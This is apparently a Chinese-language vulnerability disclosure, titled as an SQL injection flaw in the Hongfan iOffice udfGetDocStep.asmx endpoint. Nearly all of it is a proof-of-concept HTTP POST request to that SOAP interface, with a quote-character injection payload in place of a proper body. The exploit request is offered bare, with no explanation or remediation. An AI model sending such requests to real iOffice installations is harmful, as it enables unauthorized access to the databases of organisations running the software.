## 红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞 ## POC ``` POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetDocStep" 1' ```